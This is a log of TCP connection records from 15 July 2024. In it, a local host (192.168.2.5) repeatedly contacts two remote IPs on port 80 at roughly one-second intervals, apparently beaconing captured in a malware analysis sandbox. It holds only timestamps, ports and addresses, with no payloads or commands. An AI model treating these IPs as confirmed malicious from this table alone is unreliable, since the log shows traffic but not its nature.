Jul 15, 2024 06:13:39.815506935 CEST	80	49765	186.101.193.110	192.168.2.5
Jul 15, 2024 06:13:39.864671946 CEST	49766	80	192.168.2.5	46.246.96.149
Jul 15, 2024 06:13:39.869596958 CEST	80	49766	46.246.96.149	192.168.2.5
Jul 15, 2024 06:13:39.869683981 CEST	49766	80	192.168.2.5	46.246.96.149
Jul 15, 2024 06:13:39.870352030 CEST	49766	80	192.168.2.5	46.246.96.149
Jul 15, 2024 06:13:39.875164032 CEST	80	49766	46.246.96.149	192.168.2.5
Jul 15, 2024 06:13:40.563427925 CEST	80	49766	46.246.96.149	192.168.2.5
Jul 15, 2024 06:13:40.563715935 CEST	49766	80	192.168.2.5	46.246.96.149
Jul 15, 2024 06:13:40.569053888 CEST	80	49766	46.246.96.149	192.168.2.5
Jul 15, 2024 06:13:40.569132090 CEST	49766	80	192.168.2.5	46.246.96.149
Jul 15, 2024 06:13:40.674398899 CEST	49767	80	192.168.2.5	46.246.96.149
Jul 15, 2024 06:13:40.679265976 CEST	80	49767	46.246.96.149	192.168.2.5
Jul 15, 2024 06:13:40.679348946 CEST	49767	80	192.168.2.5	46.246.96.149
Jul 15, 2024 06:13:40.685163021 CEST	49767	80	192.168.2.5	46.246.96.149
Jul 15, 2024 06:13:40.690020084 CEST	80	49767	46.246.96.149	192.168.2.5
Jul 15, 2024 06:13:40.900899887 CEST	80	49765	186.101.193.110	192.168.2.5
Jul 15, 2024 06:13:40.900930882 CEST	80	49765	186.101.193.110	192.168.2.5
Jul 15, 2024 06:13:40.901006937 CEST	49765	80	192.168.2.5	186.101.193.110
Jul 15, 2024 06:13:40.901168108 CEST	49765	80	192.168.2.5	186.101.193.110
Jul 15, 2024 06:13:40.906128883 CEST	80	49765	186.101.193.110	192.168.2.5
Jul 15, 2024 06:13:41.379894018 CEST	80	49767	46.246.96.149	192.168.2.5
Jul 15, 2024 06:13:41.380146027 CEST	49767	80	192.168.2.5	46.246.96.149
Jul 15, 2024 06:13:41.385401964 CEST	80	49767	46.246.96.149	192.168.2.5
Jul 15, 2024 06:13:41.385500908 CEST	49767	80	192.168.2.5	46.246.96.149
Jul 15, 2024 06:13:41.515537977 CEST	49768	80	192.168.2.5	46.246.96.149
Jul 15, 2024 06:13:41.520401955 CEST	80	49768	46.246.96.149	192.168.2.5
Jul 15, 2024 06:13:41.520478964 CEST	49768	80	192.168.2.5	46.246.96.149
Jul 15, 2024 06:13:41.520900965 CEST	49768	80	192.168.2.5	46.246.96.149
Jul 15, 2024 06:13:41.525707960 CEST	80	49768	46.246.96.149	192.168.2.5
Jul 15, 2024 06:13:42.212558985 CEST	80	49768	46.246.96.149	192.168.2.5
Jul 15, 2024 06:13:42.212856054 CEST	49768	80	192.168.2.5	46.246.96.149
Jul 15, 2024 06:13:42.218116045 CEST	80	49768	46.246.96.149	192.168.2.5
Jul 15, 2024 06:13:42.218199968 CEST	49768	80	192.168.2.5	46.246.96.149
Jul 15, 2024 06:13:42.335705996 CEST	49769	80	192.168.2.5	46.246.96.149
Jul 15, 2024 06:13:42.340841055 CEST	80	49769	46.246.96.149	192.168.2.5
Jul 15, 2024 06:13:42.340925932 CEST	49769	80	192.168.2.5	46.246.96.149
Jul 15, 2024 06:13:42.340989113 CEST	49769	80	192.168.2.5	46.246.96.149
Jul 15, 2024 06:13:42.345792055 CEST	80	49769	46.246.96.149	192.168.2.5
Jul 15, 2024 06:13:43.048222065 CEST	80	49769	46.246.96.149	192.168.2.5
Jul 15, 2024 06:13:43.048391104 CEST	49769	80	192.168.2.5	46.246.96.149
Jul 15, 2024 06:13:43.054116964 CEST	80	49769	46.246.96.149	192.168.2.5
Jul 15, 2024 06:13:43.054179907 CEST	49769	80	192.168.2.5	46.246.96.149
Jul 15, 2024 06:13:43.159284115 CEST	49770	80	192.168.2.5	46.246.96.149
Jul 15, 2024 06:13:43.164383888 CEST	80	49770	46.246.96.149	192.168.2.5
Jul 15, 2024 06:13:43.164457083 CEST	49770	80	192.168.2.5	46.246.96.149
Jul 15, 2024 06:13:43.164518118 CEST	49770	80	192.168.2.5	46.246.96.149
Jul 15, 2024 06:13:43.169389009 CEST	80	49770	46.246.96.149	192.168.2.5
Jul 15, 2024 06:13:43.852001905 CEST	80	49770	46.246.96.149	192.168.2.5
Jul 15, 2024 06:13:43.852143049 CEST	49770	80	192.168.2.5	46.246.96.149
Jul 15, 2024 06:13:43.857429028 CEST	80	49770	46.246.96.149	192.168.2.5
Jul 15, 2024 06:13:43.857506037 CEST	49770	80	192.168.2.5	46.246.96.149
Jul 15, 2024 06:13:43.970798016 CEST	49771	80	192.168.2.5	46.246.96.149
Jul 15, 2024 06:13:43.975830078 CEST	80	49771	46.246.96.149	192.168.2.5
Jul 15, 2024 06:13:43.975928068 CEST	49771	80	192.168.2.5	46.246.96.149
Jul 15, 2024 06:13:43.975990057 CEST	49771	80	192.168.2.5	46.246.96.149
Jul 15, 2024 06:13:43.980823040 CEST	80	49771	46.246.96.149	192.168.2.5
Jul 15, 2024 06:13:44.678807974 CEST	80	49771	46.246.96.149	192.168.2.5
Jul 15, 2024 06:13:44.679086924 CEST	49771	80	192.168.2.5	46.246.96.149
Jul 15, 2024 06:13:44.684566021 CEST	80	49771	46.246.96.149	192.168.2.5
Jul 15, 2024 06:13:44.684650898 CEST	49771	80	192.168.2.5	46.246.96.149
Jul 15, 2024 06:13:44.802580118 CEST	49772	80	192.168.2.5	46.246.96.149
Jul 15, 2024 06:13:44.808125973 CEST	80	49772	46.246.96.149	192.168.2.5
Jul 15, 2024 06:13:44.808218956 CEST	49772	80	192.168.2.5	46.246.96.149
Jul 15, 2024 06:13:44.810122967 CEST	49772	80	192.168.2.5	46.246.96.149
Jul 15, 2024 06:13:44.815551996 CEST	80	49772	46.246.96.149	192.168.2.5
Jul 15, 2024 06:13:45.052531004 CEST	49773	80	192.168.2.5	186.101.193.110
Jul 15, 2024 06:13:45.057590008 CEST	80	49773	186.101.193.110	192.168.2.5
Jul 15, 2024 06:13:45.057678938 CEST	49773	80	192.168.2.5	186.101.193.110
Jul 15, 2024 06:13:45.057849884 CEST	49773	80	192.168.2.5	186.101.193.110
Jul 15, 2024 06:13:45.057887077 CEST	49773	80	192.168.2.5	186.101.193.110
Jul 15, 2024 06:13:45.062978983 CEST	80	49773	186.101.193.110	192.168.2.5
Jul 15, 2024 06:13:45.062988043 CEST	80	49773	186.101.193.110	192.168.2.5
Jul 15, 2024 06:13:45.519481897 CEST	80	49772	46.246.96.149	192.168.2.5
Jul 15, 2024 06:13:45.519733906 CEST	49772	80	192.168.2.5	46.246.96.149
Jul 15, 2024 06:13:45.524890900 CEST	80	49772	46.246.96.149	192.168.2.5
Jul 15, 2024 06:13:45.524951935 CEST	49772	80	192.168.2.5	46.246.96.149
Jul 15, 2024 06:13:45.627074003 CEST	49774	80	192.168.2.5	46.246.96.149
Jul 15, 2024 06:13:45.632052898 CEST	80	49774	46.246.96.149	192.168.2.5
Jul 15, 2024 06:13:45.632148027 CEST	49774	80	192.168.2.5	46.246.96.149
Jul 15, 2024 06:13:45.638272047 CEST	49774	80	192.168.2.5	46.246.96.149
Jul 15, 2024 06:13:45.643146038 CEST	80	49774	46.246.96.149	192.168.2.5
Jul 15, 2024 06:13:46.125993013 CEST	80	49773	186.101.193.110	192.168.2.5
Jul 15, 2024 06:13:46.126017094 CEST	80	49773	186.101.193.110	192.168.2.5
Jul 15, 2024 06:13:46.126087904 CEST	49773	80	192.168.2.5	186.101.193.110
Jul 15, 2024 06:13:46.126190901 CEST	49773	80	192.168.2.5	186.101.193.110
Jul 15, 2024 06:13:46.131102085 CEST	80	49773	186.101.193.110	192.168.2.5
Jul 15, 2024 06:13:46.338176012 CEST	80	49774	46.246.96.149	192.168.2.5
Jul 15, 2024 06:13:46.338347912 CEST	49774	80	192.168.2.5	46.246.96.149
Jul 15, 2024 06:13:46.344141960 CEST	80	49774	46.246.96.149	192.168.2.5
Jul 15, 2024 06:13:46.344211102 CEST	49774	80	192.168.2.5	46.246.96.149
Jul 15, 2024 06:13:46.455287933 CEST	49775	80	192.168.2.5	46.246.96.149
Jul 15, 2024 06:13:46.460244894 CEST	80	49775	46.246.96.149	192.168.2.5
Jul 15, 2024 06:13:46.460319996 CEST	49775	80	192.168.2.5	46.246.96.149
Jul 15, 2024 06:13:46.460412979 CEST	49775	80	192.168.2.5	46.246.96.149
Jul 15, 2024 06:13:46.465183973 CEST	80	49775	46.246.96.149	192.168.2.5
Jul 15, 2024 06:13:47.157293081 CEST	80	49775	46.246.96.149	192.168.2.5
Jul 15, 2024 06:13:47.158051014 CEST	49775	80	192.168.2.5	46.246.96.149
Jul 15, 2024 06:13:47.163386106 CEST	80	49775	46.246.96.149	192.168.2.5
Jul 15, 2024 06:13:47.163458109 CEST	49775	80	192.168.2.5	46.246.96.149
Jul 15, 2024 06:13:47.295315027 CEST	49776	80	192.168.2.5	46.246.96.149
Jul 15, 2024 06:13:47.300271034 CEST	80	49776	46.246.96.149	192.168.2.5
Jul 15, 2024 06:13:47.300348043 CEST	49776	80	192.168.2.5	46.246.96.149
Jul 15, 2024 06:13:47.300512075 CEST	49776	80	192.168.2.5	46.246.96.149
Jul 15, 2024 06:13:47.305294991 CEST	80	49776	46.246.96.149	192.168.2.5
Jul 15, 2024 06:13:48.021713018 CEST	80	49776	46.246.96.149	192.168.2.5
Jul 15, 2024 06:13:48.022772074 CEST	49776	80	192.168.2.5	46.246.96.149
Jul 15, 2024 06:13:48.029486895 CEST	80	49776	46.246.96.149	192.168.2.5
Jul 15, 2024 06:13:48.029649019 CEST	49776	80	192.168.2.5	46.246.96.149
Jul 15, 2024 06:13:48.127173901 CEST	49777	80	192.168.2.5	46.246.96.149
Jul 15, 2024 06:13:48.133204937 CEST	80	49777	46.246.96.149	192.168.2.5
Jul 15, 2024 06:13:48.133379936 CEST	49777	80	192.168.2.5	46.246.96.149
Jul 15, 2024 06:13:48.134089947 CEST	49777	80	192.168.2.5	46.246.96.149
Jul 15, 2024 06:13:48.140876055 CEST	80	49777	46.246.96.149	192.168.2.5
Jul 15, 2024 06:13:48.822381973 CEST	80	49777	46.246.96.149	192.168.2.5
Jul 15, 2024 06:13:48.822530985 CEST	49777	80	192.168.2.5	46.246.96.149
Jul 15, 2024 06:13:48.827903032 CEST	80	49777	46.246.96.149	192.168.2.5
Jul 15, 2024 06:13:48.827970028 CEST	49777	80	192.168.2.5	46.246.96.149
Jul 15, 2024 06:13:48.939623117 CEST	49778	80	192.168.2.5	46.246.96.149
Jul 15, 2024 06:13:48.944685936 CEST	80	49778	46.246.96.149	192.168.2.5
Jul 15, 2024 06:13:48.944785118 CEST	49778	80	192.168.2.5	46.246.96.149
Jul 15, 2024 06:13:48.950762033 CEST	49778	80	192.168.2.5	46.246.96.149
Jul 15, 2024 06:13:48.955857992 CEST	80	49778	46.246.96.149	192.168.2.5
Jul 15, 2024 06:13:49.629947901 CEST	80	49778	46.246.96.149	192.168.2.5
Jul 15, 2024 06:13:49.630918980 CEST	49778	80	192.168.2.5	46.246.96.149
Jul 15, 2024 06:13:49.637058973 CEST	80	49778	46.246.96.149	192.168.2.5
Jul 15, 2024 06:13:49.637226105 CEST	49778	80	192.168.2.5	46.246.96.149
Jul 15, 2024 06:13:49.737199068 CEST	49779	80	192.168.2.5	46.246.96.149
Jul 15, 2024 06:13:49.742204905 CEST	80	49779	46.246.96.149	192.168.2.5
Jul 15, 2024 06:13:49.742315054 CEST	49779	80	192.168.2.5	46.246.96.149
Jul 15, 2024 06:13:49.748111963 CEST	49779	80	192.168.2.5	46.246.96.149
Jul 15, 2024 06:13:49.752954960 CEST	80	49779	46.246.96.149	192.168.2.5
Jul 15, 2024 06:13:50.453068972 CEST	80	49779	46.246.96.149	192.168.2.5
Jul 15, 2024 06:13:50.453337908 CEST	49779	80	192.168.2.5	46.246.96.149
Jul 15, 2024 06:13:50.458575010 CEST	80	49779	46.246.96.149	192.168.2.5
Jul 15, 2024 06:13:50.458651066 CEST	49779	80	192.168.2.5	46.246.96.149
Jul 15, 2024 06:13:50.478724003 CEST	49780	80	192.168.2.5	186.101.193.110
Jul 15, 2024 06:13:50.484106064 CEST	80	49780	186.101.193.110	192.168.2.5
Jul 15, 2024 06:13:50.484191895 CEST	49780	80	192.168.2.5	186.101.193.110
Jul 15, 2024 06:13:50.484285116 CEST	49780	80	192.168.2.5	186.101.193.110
Jul 15, 2024 06:13:50.484298944 CEST	49780	80	192.168.2.5	186.101.193.110
Jul 15, 2024 06:13:50.489046097 CEST	80	49780	186.101.193.110	192.168.2.5
Jul 15, 2024 06:13:50.489183903 CEST	80	49780	186.101.193.110	192.168.2.5
Jul 15, 2024 06:13:50.564618111 CEST	49781	80	192.168.2.5	46.246.96.149
Jul 15, 2024 06:13:50.569592953 CEST	80	49781	46.246.96.149	192.168.2.5
Jul 15, 2024 06:13:50.569679976 CEST	49781	80	192.168.2.5	46.246.96.149
Jul 15, 2024 06:13:50.569794893 CEST	49781	80	192.168.2.5	46.246.96.149
Jul 15, 2024 06:13:50.574604988 CEST	80	49781	46.246.96.149	192.168.2.5
Jul 15, 2024 06:13:51.288285017 CEST	80	49781	46.246.96.149	192.168.2.5
Jul 15, 2024 06:13:51.288491964 CEST	49781	80	192.168.2.5	46.246.96.149
Jul 15, 2024 06:13:51.293756962 CEST	80	49781	46.246.96.149	192.168.2.5
Jul 15, 2024 06:13:51.293838024 CEST	49781	80	192.168.2.5	46.246.96.149
Jul 15, 2024 06:13:51.408446074 CEST	49782	80	192.168.2.5	46.246.96.149
Jul 15, 2024 06:13:51.413650036 CEST	80	49782	46.246.96.149	192.168.2.5
Jul 15, 2024 06:13:51.413722992 CEST	49782	80	192.168.2.5	46.246.96.149
Jul 15, 2024 06:13:51.414341927 CEST	49782	80	192.168.2.5	46.246.96.149
Jul 15, 2024 06:13:51.419142962 CEST	80	49782	46.246.96.149	192.168.2.5
Jul 15, 2024 06:13:51.529536009 CEST	80	49780	186.101.193.110	192.168.2.5
Jul 15, 2024 06:13:51.529548883 CEST	80	49780	186.101.193.110	192.168.2.5
Jul 15, 2024 06:13:51.529697895 CEST	49780	80	192.168.2.5	186.101.193.110
Jul 15, 2024 06:13:51.529772043 CEST	49780	80	192.168.2.5	186.101.193.110
Jul 15, 2024 06:13:51.534655094 CEST	80	49780	186.101.193.110	192.168.2.5
Jul 15, 2024 06:13:52.118026018 CEST	80	49782	46.246.96.149	192.168.2.5
Jul 15, 2024 06:13:52.118161917 CEST	49782	80	192.168.2.5	46.246.96.149
Jul 15, 2024 06:13:52.123328924 CEST	80	49782	46.246.96.149	192.168.2.5
Jul 15, 2024 06:13:52.123383045 CEST	49782	80	192.168.2.5	46.246.96.149
Jul 15, 2024 06:13:52.237425089 CEST	49783	80	192.168.2.5	46.246.96.149
Jul 15, 2024 06:13:52.242489100 CEST	80	49783	46.246.96.149	192.168.2.5
Jul 15, 2024 06:13:52.242655039 CEST	49783	80	192.168.2.5	46.246.96.149
Jul 15, 2024 06:13:52.242655039 CEST	49783	80	192.168.2.5	46.246.96.149
Jul 15, 2024 06:13:52.247629881 CEST	80	49783	46.246.96.149	192.168.2.5
Jul 15, 2024 06:13:52.949642897 CEST	80	49783	46.246.96.149	192.168.2.5
Jul 15, 2024 06:13:52.949882984 CEST	49783	80	192.168.2.5	46.246.96.149
Jul 15, 2024 06:13:52.955271006 CEST	80	49783	46.246.96.149	192.168.2.5
Jul 15, 2024 06:13:52.955324888 CEST	49783	80	192.168.2.5	46.246.96.149
Jul 15, 2024 06:13:53.064590931 CEST	49784	80	192.168.2.5	46.246.96.149
Jul 15, 2024 06:13:53.069540024 CEST	80	49784	46.246.96.149	192.168.2.5
Jul 15, 2024 06:13:53.069627047 CEST	49784	80	192.168.2.5	46.246.96.149
Jul 15, 2024 06:13:53.070255041 CEST	49784	80	192.168.2.5	46.246.96.149
Jul 15, 2024 06:13:53.075103045 CEST	80	49784	46.246.96.149	192.168.2.5
Jul 15, 2024 06:13:53.762818098 CEST	80	49784	46.246.96.149	192.168.2.5
Jul 15, 2024 06:13:53.762989044 CEST	49784	80	192.168.2.5	46.246.96.149
Jul 15, 2024 06:13:53.768352032 CEST	80	49784	46.246.96.149	192.168.2.5
Jul 15, 2024 06:13:53.768431902 CEST	49784	80	192.168.2.5	46.246.96.149
Jul 15, 2024 06:13:53.877072096 CEST	49785	80	192.168.2.5	46.246.96.149
Jul 15, 2024 06:13:53.883865118 CEST	80	49785	46.246.96.149	192.168.2.5
Jul 15, 2024 06:13:53.884051085 CEST	49785	80	192.168.2.5	46.246.96.149
Jul 15, 2024 06:13:53.884634972 CEST	49785	80	192.168.2.5	46.246.96.149
Jul 15, 2024 06:13:53.891244888 CEST	80	49785	46.246.96.149	192.168.2.5
Jul 15, 2024 06:13:54.628289938 CEST	80	49785	46.246.96.149	192.168.2.5
Jul 15, 2024 06:13:54.628494024 CEST	49785	80	192.168.2.5	46.246.96.149
Jul 15, 2024 06:13:54.633692980 CEST	80	49785	46.246.96.149	192.168.2.5
Jul 15, 2024 06:13:54.633776903 CEST	49785	80	192.168.2.5	46.246.96.149
Jul 15, 2024 06:13:54.737950087 CEST	49786	80	192.168.2.5	46.246.96.149
Jul 15, 2024 06:13:54.742893934 CEST	80	49786	46.246.96.149	192.168.2.5
Jul 15, 2024 06:13:54.742976904 CEST	49786	80	192.168.2.5	46.246.96.149
Jul 15, 2024 06:13:54.743530035 CEST	49786	80	192.168.2.5	46.246.96.149
Jul 15, 2024 06:13:54.748321056 CEST	80	49786	46.246.96.149	192.168.2.5
Jul 15, 2024 06:13:55.453135967 CEST	80	49786	46.246.96.149	192.168.2.5
Jul 15, 2024 06:13:55.453392029 CEST	49786	80	192.168.2.5	46.246.96.149
Jul 15, 2024 06:13:55.461463928 CEST	80	49786	46.246.96.149	192.168.2.5
Jul 15, 2024 06:13:55.461540937 CEST	49786	80	192.168.2.5	46.246.96.149
Jul 15, 2024 06:13:55.564817905 CEST	49787	80	192.168.2.5	46.246.96.149
Jul 15, 2024 06:13:55.570132017 CEST	80	49787	46.246.96.149	192.168.2.5
Jul 15, 2024 06:13:55.570385933 CEST	49787	80	192.168.2.5	46.246.96.149
Jul 15, 2024 06:13:55.575823069 CEST	49787	80	192.168.2.5	46.246.96.149
Jul 15, 2024 06:13:55.580765963 CEST	80	49787	46.246.96.149	192.168.2.5
Jul 15, 2024 06:13:55.980242968 CEST	49788	80	192.168.2.5	186.101.193.110
Jul 15, 2024 06:13:55.985294104 CEST	80	49788	186.101.193.110	192.168.2.5
Jul 15, 2024 06:13:55.985775948 CEST	49788	80	192.168.2.5	186.101.193.110
Jul 15, 2024 06:13:55.985775948 CEST	49788	80	192.168.2.5	186.101.193.110
Jul 15, 2024 06:13:55.985775948 CEST	49788	80	192.168.2.5	186.101.193.110
Jul 15, 2024 06:13:55.990678072 CEST	80	49788	186.101.193.110	192.168.2.5
Jul 15, 2024 06:13:55.990701914 CEST	80	49788	186.101.193.110	192.168.2.5
Jul 15, 2024 06:13:56.286751986 CEST	80	49787	46.246.96.149	192.168.2.5
Jul 15, 2024 06:13:56.286911011 CEST	49787	80	192.168.2.5	46.246.96.149
Jul 15, 2024 06:13:56.292069912 CEST	80	49787	46.246.96.149	192.168.2.5
Jul 15, 2024 06:13:56.292155981 CEST	49787	80	192.168.2.5	46.246.96.149
Jul 15, 2024 06:13:56.393872976 CEST	49789	80	192.168.2.5	46.246.96.149
Jul 15, 2024 06:13:56.398889065 CEST	80	49789	46.246.96.149	192.168.2.5
Jul 15, 2024 06:13:56.398967981 CEST	49789	80	192.168.2.5	46.246.96.149
Jul 15, 2024 06:13:56.399029016 CEST	49789	80	192.168.2.5	46.246.96.149
Jul 15, 2024 06:13:56.403822899 CEST	80	49789	46.246.96.149	192.168.2.5
Jul 15, 2024 06:13:57.048315048 CEST	80	49788	186.101.193.110	192.168.2.5
Jul 15, 2024 06:13:57.048352957 CEST	80	49788	186.101.193.110	192.168.2.5
Jul 15, 2024 06:13:57.048408031 CEST	49788	80	192.168.2.5	186.101.193.110
Jul 15, 2024 06:13:57.048527002 CEST	49788	80	192.168.2.5	186.101.193.110
Jul 15, 2024 06:13:57.053276062 CEST	80	49788	186.101.193.110	192.168.2.5
Jul 15, 2024 06:13:57.085050106 CEST	80	49789	46.246.96.149	192.168.2.5
Jul 15, 2024 06:13:57.085206032 CEST	49789	80	192.168.2.5	46.246.96.149
Jul 15, 2024 06:13:57.090342045 CEST	80	49789	46.246.96.149	192.168.2.5
Jul 15, 2024 06:13:57.090409040 CEST	49789	80	192.168.2.5	46.246.96.149
Jul 15, 2024 06:13:57.205835104 CEST	49790	80	192.168.2.5	46.246.96.149
Jul 15, 2024 06:13:57.210819960 CEST	80	49790	46.246.96.149	192.168.2.5
Jul 15, 2024 06:13:57.210906029 CEST	49790	80	192.168.2.5	46.246.96.149
Jul 15, 2024 06:13:57.216432095 CEST	49790	80	192.168.2.5	46.246.96.149
Jul 15, 2024 06:13:57.221280098 CEST	80	49790	46.246.96.149	192.168.2.5
Jul 15, 2024 06:13:57.902569056 CEST	80	49790	46.246.96.149	192.168.2.5
Jul 15, 2024 06:13:57.902720928 CEST	49790	80	192.168.2.5	46.246.96.149
Jul 15, 2024 06:13:57.908020973 CEST	80	49790	46.246.96.149	192.168.2.5
Jul 15, 2024 06:13:57.908499956 CEST	49790	80	192.168.2.5	46.246.96.149
Jul 15, 2024 06:13:58.019197941 CEST	49791	80	192.168.2.5	46.246.96.149
Jul 15, 2024 06:13:58.024127960 CEST	80	49791	46.246.96.149	192.168.2.5
Jul 15, 2024 06:13:58.024192095 CEST	49791	80	192.168.2.5	46.246.96.149
Jul 15, 2024 06:13:58.024775982 CEST	49791	80	192.168.2.5	46.246.96.149
Jul 15, 2024 06:13:58.029517889 CEST	80	49791	46.246.96.149	192.168.2.5
Jul 15, 2024 06:13:58.721822977 CEST	80	49791	46.246.96.149	192.168.2.5
Jul 15, 2024 06:13:58.729198933 CEST	49791	80	192.168.2.5	46.246.96.149
Jul 15, 2024 06:13:58.734488964 CEST	80	49791	46.246.96.149	192.168.2.5
Jul 15, 2024 06:13:58.734555006 CEST	49791	80	192.168.2.5	46.246.96.149
Jul 15, 2024 06:13:58.895984888 CEST	49792	80	192.168.2.5	46.246.96.149
Jul 15, 2024 06:13:58.901004076 CEST	80	49792	46.246.96.149	192.168.2.5
Jul 15, 2024 06:13:58.901092052 CEST	49792	80	192.168.2.5	46.246.96.149
Jul 15, 2024 06:13:58.907531977 CEST	49792	80	192.168.2.5	46.246.96.149
Jul 15, 2024 06:13:58.912380934 CEST	80	49792	46.246.96.149	192.168.2.5
Jul 15, 2024 06:13:59.755383968 CEST	80	49792	46.246.96.149	192.168.2.5
Jul 15, 2024 06:13:59.755552053 CEST	49792	80	192.168.2.5	46.246.96.149
Jul 15, 2024 06:13:59.760615110 CEST	80	49792	46.246.96.149	192.168.2.5
Jul 15, 2024 06:13:59.760674953 CEST	49792	80	192.168.2.5	46.246.96.149
Jul 15, 2024 06:13:59.862231970 CEST	49793	80	192.168.2.5	46.246.96.149
Jul 15, 2024 06:13:59.867183924 CEST	80	49793	46.246.96.149	192.168.2.5
Jul 15, 2024 06:13:59.867261887 CEST	49793	80	192.168.2.5	46.246.96.149
Jul 15, 2024 06:13:59.867857933 CEST	49793	80	192.168.2.5	46.246.96.149
Jul 15, 2024 06:13:59.872724056 CEST	80	49793	46.246.96.149	192.168.2.5
Jul 15, 2024 06:14:00.590145111 CEST	80	49793	46.246.96.149	192.168.2.5
Jul 15, 2024 06:14:00.590279102 CEST	49793	80	192.168.2.5	46.246.96.149
Jul 15, 2024 06:14:00.595572948 CEST	80	49793	46.246.96.149	192.168.2.5
Jul 15, 2024 06:14:00.595618963 CEST	49793	80	192.168.2.5	46.246.96.149
Jul 15, 2024 06:14:00.706146955 CEST	49794	80	192.168.2.5	46.246.96.149
Jul 15, 2024 06:14:00.820180893 CEST	80	49794	46.246.96.149	192.168.2.5
Jul 15, 2024 06:14:00.820278883 CEST	49794	80	192.168.2.5	46.246.96.149
Jul 15, 2024 06:14:00.821029902 CEST	49794	80	192.168.2.5	46.246.96.149
Jul 15, 2024 06:14:00.825855017 CEST	80	49794	46.246.96.149	192.168.2.5
Jul 15, 2024 06:14:01.195749044 CEST	49795	80	192.168.2.5	186.101.193.110
Jul 15, 2024 06:14:01.200886965 CEST	80	49795	186.101.193.110	192.168.2.5
Jul 15, 2024 06:14:01.200958014 CEST	49795	80	192.168.2.5	186.101.193.110
Jul 15, 2024 06:14:01.201127052 CEST	49795	80	192.168.2.5	186.101.193.110
Jul 15, 2024 06:14:01.201169014 CEST	49795	80	192.168.2.5	186.101.193.110
Jul 15, 2024 06:14:01.205898046 CEST	80	49795	186.101.193.110	192.168.2.5
Jul 15, 2024 06:14:01.205988884 CEST	80	49795	186.101.193.110	192.168.2.5
Jul 15, 2024 06:14:01.514548063 CEST	80	49794	46.246.96.149	192.168.2.5
Jul 15, 2024 06:14:01.518244028 CEST	49794	80	192.168.2.5	46.246.96.149
Jul 15, 2024 06:14:01.523714066 CEST	80	49794	46.246.96.149	192.168.2.5
Jul 15, 2024 06:14:01.523785114 CEST	49794	80	192.168.2.5	46.246.96.149
Jul 15, 2024 06:14:01.656661987 CEST	49796	80	192.168.2.5	46.246.96.149
Jul 15, 2024 06:14:01.661509991 CEST	80	49796	46.246.96.149	192.168.2.5
Jul 15, 2024 06:14:01.661577940 CEST	49796	80	192.168.2.5	46.246.96.149
Jul 15, 2024 06:14:01.661642075 CEST	49796	80	192.168.2.5	46.246.96.149
Jul 15, 2024 06:14:01.666415930 CEST	80	49796	46.246.96.149	192.168.2.5
Jul 15, 2024 06:14:02.263787031 CEST	80	49795	186.101.193.110	192.168.2.5
Jul 15, 2024 06:14:02.263916969 CEST	80	49795	186.101.193.110	192.168.2.5
Jul 15, 2024 06:14:02.264070988 CEST	49795	80	192.168.2.5	186.101.193.110
Jul 15, 2024 06:14:02.264070988 CEST	49795	80	192.168.2.5	186.101.193.110
Jul 15, 2024 06:14:02.268927097 CEST	80	49795	186.101.193.110	192.168.2.5
Jul 15, 2024 06:14:02.348503113 CEST	80	49796	46.246.96.149	192.168.2.5
Jul 15, 2024 06:14:02.348696947 CEST	49796	80	192.168.2.5	46.246.96.149
Jul 15, 2024 06:14:02.354959011 CEST	80	49796	46.246.96.149	192.168.2.5
Jul 15, 2024 06:14:02.355034113 CEST	49796	80	192.168.2.5	46.246.96.149
Jul 15, 2024 06:14:02.455313921 CEST	49797	80	192.168.2.5	46.246.96.149
Jul 15, 2024 06:14:02.460268021 CEST	80	49797	46.246.96.149	192.168.2.5
Jul 15, 2024 06:14:02.460354090 CEST	49797	80	192.168.2.5	46.246.96.149
Jul 15, 2024 06:14:02.461045980 CEST	49797	80	192.168.2.5	46.246.96.149
Jul 15, 2024 06:14:02.465809107 CEST	80	49797	46.246.96.149	192.168.2.5
Jul 15, 2024 06:14:03.174436092 CEST	80	49797	46.246.96.149	192.168.2.5
Jul 15, 2024 06:14:03.174601078 CEST	49797	80	192.168.2.5	46.246.96.149
Jul 15, 2024 06:14:03.179996014 CEST	80	49797	46.246.96.149	192.168.2.5
Jul 15, 2024 06:14:03.180061102 CEST	49797	80	192.168.2.5	46.246.96.149
Jul 15, 2024 06:14:03.303755045 CEST	49798	80	192.168.2.5	46.246.96.149
Jul 15, 2024 06:14:03.308614969 CEST	80	49798	46.246.96.149	192.168.2.5
Jul 15, 2024 06:14:03.308710098 CEST	49798	80	192.168.2.5	46.246.96.149
Jul 15, 2024 06:14:03.312067032 CEST	49798	80	192.168.2.5	46.246.96.149
Jul 15, 2024 06:14:03.316829920 CEST	80	49798	46.246.96.149	192.168.2.5
Jul 15, 2024 06:14:03.995114088 CEST	80	49798	46.246.96.149	192.168.2.5
Jul 15, 2024 06:14:03.995285034 CEST	49798	80	192.168.2.5	46.246.96.149
Jul 15, 2024 06:14:04.000571012 CEST	80	49798	46.246.96.149	192.168.2.5
Jul 15, 2024 06:14:04.000638962 CEST	49798	80	192.168.2.5	46.246.96.149
Jul 15, 2024 06:14:04.111552954 CEST	49799	80	192.168.2.5	46.246.96.149
Jul 15, 2024 06:14:04.116475105 CEST	80	49799	46.246.96.149	192.168.2.5
Jul 15, 2024 06:14:04.116569996 CEST	49799	80	192.168.2.5	46.246.96.149
Jul 15, 2024 06:14:04.116628885 CEST	49799	80	192.168.2.5	46.246.96.149
Jul 15, 2024 06:14:04.121413946 CEST	80	49799	46.246.96.149	192.168.2.5
Jul 15, 2024 06:14:05.041591883 CEST	80	49799	46.246.96.149	192.168.2.5
Jul 15, 2024 06:14:05.041744947 CEST	49799	80	192.168.2.5	46.246.96.149
Jul 15, 2024 06:14:05.047033072 CEST	80	49799	46.246.96.149	192.168.2.5
Jul 15, 2024 06:14:05.047091007 CEST	49799	80	192.168.2.5	46.246.96.149
Jul 15, 2024 06:14:05.159796953 CEST	49800	80	192.168.2.5	46.246.96.149
Jul 15, 2024 06:14:05.164782047 CEST	80	49800	46.246.96.149	192.168.2.5
Jul 15, 2024 06:14:05.164859056 CEST	49800	80	192.168.2.5	46.246.96.149
Jul 15, 2024 06:14:05.164952040 CEST	49800	80	192.168.2.5	46.246.96.149
Jul 15, 2024 06:14:05.169694901 CEST	80	49800	46.246.96.149	192.168.2.5
Jul 15, 2024 06:14:05.895535946 CEST	80	49800	46.246.96.149	192.168.2.5
Jul 15, 2024 06:14:05.895664930 CEST	49800	80	192.168.2.5	46.246.96.149
Jul 15, 2024 06:14:05.900789976 CEST	80	49800	46.246.96.149	192.168.2.5
Jul 15, 2024 06:14:05.900840044 CEST	49800	80	192.168.2.5	46.246.96.149
